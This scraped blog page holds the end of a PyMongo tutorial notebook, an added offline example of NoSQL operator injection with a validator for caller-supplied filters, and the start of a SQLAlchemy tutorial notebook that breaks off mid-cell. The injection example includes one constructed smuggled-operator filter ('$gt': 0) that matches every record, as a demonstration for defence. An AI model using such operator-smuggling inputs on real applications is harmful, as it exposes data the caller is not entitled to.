<span style="color: white;">list(securitynik_db.employees.aggregate([{</span><span style="color: #0086d2;">'$match'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'fname'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'Nik'</span><span style="color: white;">}},</span> <span style="color: white;">{</span><span style="color: #0086d2;">'$project'</span> <span style="color: white;">:</span> <span style="color: white;">{</span><span style="color: #0086d2;">'lname'</span> <span style="color: white;">:</span> <span style="color: #0086f7; font-weight: bold;">3</span><span style="color: white;">,</span> <span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">,</span> <span style="color: #0086d2;">'_id'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: white;">}},</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$limit'</span> <span style="color: white;">:</span> <span style="color: #0086f7; font-weight: bold;">3</span><span style="color: white;">}]))</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># Using aggregate feature</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># doing most of the work at the server</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># count the number of returned records</span>
<span style="color: white;">list(securitynik_db.employees.aggregate([{</span><span style="color: #0086d2;">'$match'</span> <span style="color: white;">:</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'fname'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'Nik'</span><span style="color: white;">}},</span> <span style="color: white;">{</span><span style="color: #0086d2;">'$project'</span> <span style="color: white;">:</span> <span style="color: white;">{</span><span style="color: #0086d2;">'lname'</span> <span style="color: white;">:</span> <span style="color: #0086f7; font-weight: bold;">3</span><span style="color: white;">,</span> <span style="color: #0086d2;">'fname'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">1</span><span style="color: white;">,</span> <span style="color: #0086d2;">'_id'</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: white;">}},</span> <span style="color: white;">{</span> <span style="color: #0086d2;">'$limit'</span> <span style="color: white;">:</span> <span style="color: #0086f7; font-weight: bold;">3</span><span style="color: white;">},</span> <span style="color: white;">{</span><span style="color: #0086d2;">'$count'</span> <span style="color: white;">:</span> <span style="color: #0086d2;">'fname'</span><span style="color: white;">}]))</span>
<span style="background-color: #0f140f; color: #008800; font-style: italic;"># %%</span>
<span style="color: #0086d2;">''' </span>
<span style="color: #0086d2;">References:</span>
<span style="color: #0086d2;">https://hevodata.com/learn/python-pymongo-mongoclient/</span>
<span style="color: #0086d2;">https://campus.datacamp.com/courses/introduction-to-using-mongodb-for-data-science-with-python/</span>
<span style="color: #0086d2;">https://www.linkedin.com/pulse/mongodb-101-beginners-part1-amany-mounes/</span>
<span style="color: #0086d2;">https://www.mongodb.com/docs/manual/tutorial/query-documents/#std-label-read-operations-query-argument</span>
<span style="color: #0086d2;">https://www.tutorialspoint.com/python_mongodb/python_mongodb_tutorial.pdf</span>
<span style="color: #0086d2;">https://www.bogotobogo.com/python/MongoDB_PyMongo/python_MongoDB_pyMongo_tutorial_connecting_accessing.php</span>
<span style="color: #0086d2;">https://pymongo.readthedocs.io/en/stable/api/pymongo/mongo_client.html</span>
<span style="color: #0086d2;">https://www.mongodb.com/docs/manual/reference/operator/query/</span>
<span style="color: #0086d2;">https://www.educba.com/mongodb-query-operators/</span>
<span style="color: #0086d2;">https://www.w3schools.in/mongodb/projection-queries</span>
<span style="color: #0086d2;">'''</span>
</pre></td></tr></tbody></table></div>
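The operators used in the notebook above ($eq, $lt, $gt, $in, $nin, $exists) are ordinary dict keys, so a filter built from untrusted input (json.loads of a request body, for instance) carries any operator the caller writes straight into find() or count_documents(). As an added example that is not part of the original post, the block below emulates those operators over constructed copies of the notebook's records (no MongoDB server needed; the evaluator is a simplified stand-in for pymongo, not its code) and shows a validator that keeps caller-supplied filters to scalar, whitelisted fields.

```python
"""Added example (not part of the original notebook): a simplified emulation of
the query operators used above, plus a validator for caller-supplied filters.
The evaluator is a stand-in for pymongo so the example runs offline."""
import json

# Constructed sample records, mirroring the insert_many list in the notebook.
EMPLOYEES = [
    {'user': 'User-1', 'blog': 'www.blogspot.com', 'age': 80, 'sex': 'Male'},
    {'user': 'User-2', 'blog': 'www.blogspot.com', 'age': 90, 'sex': 'Female'},
    {'user': 'User-3', 'blog': 'www.blogspot.com', 'age': 1000, 'sex': 'Male'},
]

# Fields a caller may filter on, and the type each value must have.
ALLOWED_FILTER_FIELDS = {'user': str, 'blog': str, 'age': int, 'sex': str}


def _match_field(value, condition, present):
    """Evaluate one field condition (simplified emulation of the operators the
    notebook uses; real MongoDB has many more and BSON type ordering)."""
    if not isinstance(condition, dict):
        return present and value == condition          # implicit $eq
    for op, arg in condition.items():
        if op == '$eq':
            ok = present and value == arg
        elif op == '$lt':
            ok = present and value < arg
        elif op == '$gt':
            ok = present and value > arg
        elif op == '$in':
            ok = present and value in arg
        elif op == '$nin':
            ok = (not present) or value not in arg
        elif op == '$exists':
            ok = present == bool(arg)   # a string like 'false' is truthy here too
        else:
            raise ValueError(f'unsupported operator {op!r}')
        if not ok:
            return False
    return True


def find(documents, query):
    """Return every document matching all field conditions in query."""
    return [doc for doc in documents
            if all(_match_field(doc.get(f), cond, f in doc)
                   for f, cond in query.items())]


def build_safe_filter(untrusted):
    """Convert a caller-supplied mapping into a filter that cannot carry
    operators: whitelisted field names only, scalar values only, coerced to
    the expected type. Raises ValueError for anything else."""
    if not isinstance(untrusted, dict):
        raise ValueError('filter must be a JSON object')
    safe = {}
    for field, value in untrusted.items():
        expected = ALLOWED_FILTER_FIELDS.get(field)
        if expected is None or field.startswith('$'):
            raise ValueError(f'field {field!r} is not filterable')
        if isinstance(value, (dict, list, bool)) or value is None:
            raise ValueError(f'field {field!r} must be a scalar')
        try:
            safe[field] = expected(value)
        except (TypeError, ValueError):
            raise ValueError(f'field {field!r} has the wrong type') from None
    return safe


def count_unsafe(body_json):
    """Filter passed through as-is: operators in the body are honoured."""
    return len(find(EMPLOYEES, json.loads(body_json)))


def count_safe(body_json):
    """Filter passed through build_safe_filter first."""
    return len(find(EMPLOYEES, build_safe_filter(json.loads(body_json))))


def rejected_by_validator(body_json):
    """True when build_safe_filter refuses the caller-supplied filter."""
    try:
        build_safe_filter(json.loads(body_json))
    except ValueError:
        return True
    return False


if __name__ == '__main__':
    lookup = '{"user": "User-2"}'
    smuggled = '{"age": {"$gt": 0}}'          # constructed: matches every record
    print('lookup   unsafe/safe:', count_unsafe(lookup), count_safe(lookup))
    print('smuggled unsafe     :', count_unsafe(smuggled))
    print('smuggled rejected   :', rejected_by_validator(smuggled))
```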
</div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PEN
Beginning SQLalchemy (published 2022-04-14, updated 2022-04-16)
See this GitHub link for the full notebook.
<a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/beginning-sql-alchemy-blog.ipynb" target="_blank">https://github.com/SecurityNik/Data-Science-and-ML/blob/main/beginning-sql-alchemy-blog.ipynb</a>
<!-- HTML generated using hilite.me --><div style="background: #111111; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;"><table><tr><td><pre style="margin: 0; line-height: 125%"><span style="color: #008800; font-style: italic; background-color: #0f140f">#!/usr/bin/env python</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># coding: utf-8</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[1]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">In this post, I am learning more about sqlalchemy</span>
<span style="color: #0086d2">'''</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># First up, import the sqlalchemy modules I will need to use</span>
<span style="color: #fb660a; font-weight: bold">from</span> <span style="color: #ffffff">sqlalchemy</span> <span style="color: #fb660a; font-weight: bold">import</span> <span style="color: #ffffff">create_engine,</span> <span style="color: #ffffff">MetaData,</span> <span style="color: #ffffff">Table,</span> <span style="color: #ffffff">Column,</span> <span style="color: #ffffff">Integer,</span> <span style="color: #ffffff">String,</span> <span style="color: #ffffff">Text,</span> <span style="color: #ffffff">text,</span> <span style="color: #ffffff">select,</span> <span style="color: #ffffff">or_,</span> <span style="color: #ffffff">and_,</span> <span style="color: #ffffff">desc,</span> <span style="color: #ffffff">func,</span> <span style="color: #ffffff">case,</span> <span style="color: #ffffff">cast,</span> <span style="color: #ffffff">Float,</span> <span style="color: #ffffff">DECIMAL,</span> <span style="color: #ffffff">Boolean,</span> <span style="color: #ffffff">insert,</span> <span style="color: #ffffff">update,</span> <span style="color: #ffffff">delete,</span> <span style="color: #ffffff">Date,</span> <span style="color: #ffffff">DateTime,</span> <span style="color: #ffffff">ARRAY,</span> <span style="color: #ffffff">ForeignKey</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Import datetime</span>
<span style="color: #fb660a; font-weight: bold">from</span> <span style="color: #ffffff">datetime</span> <span style="color: #fb660a; font-weight: bold">import</span> <span style="color: #ffffff">datetime</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># import pandas as I will use this to import and view data</span>
<span style="color: #fb660a; font-weight: bold">import</span> <span style="color: #ffffff">pandas</span> <span style="color: #fb660a; font-weight: bold">as</span> <span style="color: #ffffff">pd</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[2]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Delete the database file if it previously existed</span>
<span style="color: #ffffff">get_ipython().system(</span><span style="color: #0086d2">'del /f securitynik-db.sqlite'</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[3]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Create a SQLite database and interface to it via create_engine.</span>
<span style="color: #0086d2">As this database does not exist as yet, it will be created on the disk</span>
<span style="color: #0086d2">using the relative path. Hence the ///</span>
<span style="color: #0086d2">This engine does not actually connect to the database at this time.</span>
<span style="color: #0086d2">A connection will be made once a request has been made to perform a task</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_engine</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">create_engine(</span><span style="color: #0086d2">'sqlite:///securitynik-db.sqlite'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">echo=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">print(securitynik_db_engine)</span>
<span style="color: #0086d2">''' </span>
<span style="color: #0086d2">Setup the metadata</span>
<span style="color: #0086d2">Quoting from the sqlalchemy manual: "The MetaData is a registry which includes the ability to emit a limited set of schema generation commands to</span>
<span style="color: #0086d2">the database"</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">metadata</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">MetaData()</span>
<span style="color: #ffffff">print(metadata)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[4]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">With the engine created. Time to make a connection to the database</span>
<span style="color: #0086d2">Since the database securitynik-db.sqlite does not exist,</span>
<span style="color: #0086d2">the file will be created on the file system</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">securitynik_db_engine.connect()</span>
<span style="color: #ffffff">securitynik_db_connection</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[5]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Verifying the securitynik-db.sqlite file has been created on the file system</span>
<span style="color: #0086d2">and that it is currently empty, as no data has been written to it</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">get_ipython().system(</span><span style="color: #0086d2">'dir securitynik-db.sqlite'</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[6]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># With the file now created. Time to create some tables</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Create an employee Table</span>
<span style="color: #ffffff">employee_table</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">Table(</span><span style="color: #0086d2">'employees'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">metadata,</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'EmployeeID'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Integer(),</span> <span style="color: #ffffff">primary_key=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">unique=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">autoincrement=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'FName'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'LName'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Active'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Boolean(),</span> <span style="color: #ffffff">default=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">default=</span><span style="color: #0086d2">'securitynik.com employee'</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[7]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Create a blogs table</span>
<span style="color: #0086d2">Setup the blogger_id field to link back to the EmployeeID field in the employees table</span>
<span style="color: #0086d2">Note, could have also used ForeignKey(employee_table.columns.EmployeeID) to set up the foreign key</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">blogs_table</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">Table(</span><span style="color: #0086d2">'blogs'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">metadata,</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'BlogID'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Integer(),</span> <span style="color: #ffffff">primary_key=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">unique=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">autoincrement=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'blogger_id'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Integer(),</span> <span style="color: #ffffff">ForeignKey(</span><span style="color: #0086d2">'employees.EmployeeID'</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'BlogTitle'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Blogger'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">default=</span><span style="color: #0086d2">'Nik Alleyne'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Date'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">DateTime(),</span> <span style="color: #ffffff">default=datetime.now),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'URL'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Text(),</span> <span style="color: #ffffff">default=</span><span style="color: #0086d2">'Blog post created by Nik Alleyne'</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[8]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Create a table other</span>
<span style="color: #ffffff">other_table</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">Table(</span><span style="color: #0086d2">'other'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">metadata,</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'ID'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Integer(),</span> <span style="color: #ffffff">primary_key=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">unique=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">autoincrement=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">),</span>
<span style="color: #ffffff">Column(</span><span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">String(</span><span style="color: #0086f7; font-weight: bold">255</span><span style="color: #ffffff">),</span> <span style="color: #ffffff">nullable=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[9]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Create all the above defined tables</span>
<span style="color: #ffffff">metadata.create_all(securitynik_db_connection)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[10]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Verifying the tables were successfully created by viewing the metadata object</span>
<span style="color: #ffffff">metadata.tables</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[11]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Taking a different view of the tables via metadata</span>
<span style="color: #ffffff">metadata.sorted_tables</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[12]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">With the tables created time to insert data</span>
<span style="color: #0086d2">first into the employees table.</span>
<span style="color: #0086d2">I will first insert 1 record</span>
<span style="color: #0086d2">At the same time, return the number of rows impacted via the rowcount</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(insert(employee_table).values(FName=</span><span style="color: #0086d2">'Nik'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">LName=</span><span style="color: #0086d2">'Alleyne'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Active=</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">Comments=</span><span style="color: #0086d2">'Blog Author'</span><span style="color: #ffffff">)).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[13]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Add an entry to the blog table</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">securitynik_db_connection.execute(insert(blogs_table).values(blogger_id=</span><span style="color: #0086f7; font-weight: bold">1</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">BlogTitle=</span><span style="color: #0086d2">'Beginning SQLAlchemy'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">URL=</span><span style="color: #0086d2">'http://www.securitynik.com/beginning-sql-alchemy.html'</span><span style="color: #ffffff">)).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[14]:</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Insert some data into the other table</span>
<span style="color: #ffffff">securitynik_db_connection.execute(insert(other_table).values(Comments=</span><span style="color: #0086d2">'Nothing Exciting'</span><span style="color: #ffffff">)).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[15]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Now that I can assign 1 value at a time</span>
<span style="color: #0086d2">time to insert multiple values via a list of </span>
<span style="color: #0086d2">dictionaries</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">add_multiple_employees</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">[</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'S'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Alleyne'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Author'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'P'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Khan'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Admin'</span><span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'TQ'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'G'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Manager'</span><span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'T'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'A'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Author'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'D'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'P'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Maintainer'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'J'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'S'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Contributor'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'C'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'P'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">True</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Comments Admin'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">{</span> <span style="color: #0086d2">'FName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'A'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'LName'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'W'</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Active'</span><span style="color: #ffffff">:</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">,</span> <span style="color: #0086d2">'Comments'</span><span style="color: #ffffff">:</span><span style="color: #0086d2">'Blog Author'</span> <span style="color: #ffffff">},</span>
<span style="color: #ffffff">]</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># With the list of dictionaries built, time to submit it to the database</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># Passing the list as the second argument to execute() runs one executemany-style insert</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># At the same time, get the number of rows impacted</span>
<span style="color: #ffffff">securitynik_db_connection.execute(insert(employee_table),</span> <span style="color: #ffffff">add_multiple_employees).rowcount</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[16]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">Trying another strategy to get users into the database.</span>
<span style="color: #0086d2">In this case, read data from a CSV file and push it into the database.</span>
<span style="color: #0086d2">First read the CSV file with pandas and print the first 5 records</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">df_employees</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">pd.read_csv(</span><span style="color: #0086d2">'employees.csv'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">header=</span><span style="color: #0086f7; font-weight: bold">0</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">sep=</span><span style="color: #0086d2">','</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">df_employees.head(</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[17]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">With the dataframe now containing the CSV data</span>
<span style="color: #0086d2">time to take the dataframe data and push it into the SQLite database</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">df_employees.to_sql(name=</span><span style="color: #0086d2">'employees'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">con=securitynik_db_connection,</span> <span style="color: #ffffff">if_exists=</span><span style="color: #0086d2">'append'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">index=</span><span style="color: #fb660a; font-weight: bold">False</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[18]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">With no errors above, it looks like all is well</span>
<span style="color: #0086d2">Using the same strategy to add new blog entries</span>
<span style="color: #0086d2">'''</span>
<span style="color: #ffffff">df_blogs</span> <span style="color: #ffffff">=</span> <span style="color: #ffffff">pd.read_csv(</span><span style="color: #0086d2">'blogs.csv'</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">header=</span><span style="color: #0086f7; font-weight: bold">0</span><span style="color: #ffffff">,</span> <span style="color: #ffffff">sep=</span><span style="color: #0086d2">','</span><span style="color: #ffffff">)</span>
<span style="color: #ffffff">df_blogs.head(</span><span style="color: #0086f7; font-weight: bold">5</span><span style="color: #ffffff">)</span>
<span style="color: #008800; font-style: italic; background-color: #0f140f"># In[19]:</span>
<span style="color: #0086d2">'''</span>
<span style="color: #0086d2">With the dataframe now containing the CSV data</span>
<span style="color: #0086d2">time to take the dataframe data and push it into the SQLite database</span>
<span style="color: #0086d2">'''</span>
